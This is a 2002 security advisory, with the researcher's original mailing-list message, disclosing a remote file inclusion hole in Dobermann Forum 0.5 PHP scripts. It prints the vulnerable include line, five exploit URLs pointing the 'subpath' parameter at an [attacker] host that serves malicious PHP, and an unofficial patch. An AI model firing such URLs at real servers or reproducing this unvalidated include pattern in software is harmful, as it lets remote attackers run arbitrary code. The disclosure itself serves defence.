Forum Du Dobermann Web Forum Include File Error Lets Remote Users Execute Arbitrary Commands
|
|
SecurityTracker Alert ID: 1005492 |
|
CVE Reference: GENERIC-MAP-NOMATCH
(Links to External Site)
|
Date: Oct 28 2002
|
Impact: Execution of arbitrary code via network, User access via network
|
Description: An include file error was reported in the Dobermann Forum software. A remote user can execute arbitrary PHP code on the target system.
It is reported that several scripts include a file 'banniere.php' or 'entete.php' that is called without proper input validation
on the script path. A remote user can create the referenced PHP file on a remote system and cause the target server to execute
the referenced PHP file by sending a specially crafted URL that points the PHP script to the remote user's PHP file.
The remote
user's PHP file can include arbitrary PHP code, including system calls that will cause arbitrary shell commands to be executed on
the target server.
The following scripts include 'banniere.php': entete.php, enteteacceuil.php, and topic/entete.php. The following
scripts include 'entete.php': index.php and newtopic.php.
Some demonstration exploit examples are provided:
http://[target]/entete.php?subpath=http://[attacker]/
h
ttp://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attack
er]/
http://[target]/newtopic.php?subpath=http://[attacker]/
|
Impact: A remote user can execute arbitrary PHP code on the target server.
|
Solution: No solution was available at the time of this entry.
The author of the report has provided an unofficial patch, available in the Source Message and at:
http://www.frog-man.org/tutos/dobermannFORUM.txt
|
Vendor URL: membres.lycos.fr/forumdudobermann/dl.php (Links to External Site)
|
Cause: Input validation error
|
Underlying OS: Linux (Any), UNIX (Any), Windows (Any)
|
Reported By: "Frog Man" <leseulfrog@hotmail.com>
|
Message History:
None.
|
Source Message Contents
|
Date: Sun, 27 Oct 2002 23:53:19 +0100
From: "Frog Man" <leseulfrog@hotmail.com>
Subject: dobermann FORUM (php)
|
Informations :
°°°°°°°°°°°°°°
Product : dobermann FORUM
version : 0.5
website : http://www.le-dobermann.com
Problem : Include file
PHP Code/location :
°°°°°°°°°°°°°°°°°°°
entete.php
enteteacceuil.php
topic/entete.php :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------
index.php
newtopic.php :
------------------------
@require "config.php";
@include("entete.php");
------------------------
Exploits :
°°°°°°°°°°
http://[target]/entete.php?subpath=http://[attacker]/
http://[target]/enteteacceuil.php?subpath=http://[attacker]/
http://[target]/topic/entete.php?subpath=http://[attacker]/
http://[target]/index.php?subpath=http://[attacker]/
http://[target]/newtopic.php?subpath=http://[attacker]/
with
http://[attacker]/banniere.php
Patch :
°°°°°°°
In files :
------------------
entete.php
enteteacceuil.php
topic/entete.php
------------------
replace the line :
------------------------------------------
<?php @include $subpath."banniere.php"; ?>
------------------------------------------
by :
------------------------------------------
<?php
$banfile=$subpath."banniere.php";
if (file_exists($banfile)){
@include $banfile; }
?>
------------------------------------------
More details in french :
http://www.frog-man.org/tutos/dobermannFORUM.txt
translated by Google :
http://translate.google.com/translate?u=http%3A%2F%2Fwww.frog-man.org%2Ftutos%2FdobermannFORUM.txt&
langpair=fr%7Cen&hl=en&ie=ISO-8859-1&prev=%2Flanguage_tools
frog-m@n
_________________________________________________________________
MSN Messenger : discutez en direct avec vos amis !
http://www.msn.fr/msger/default.asp
|
|
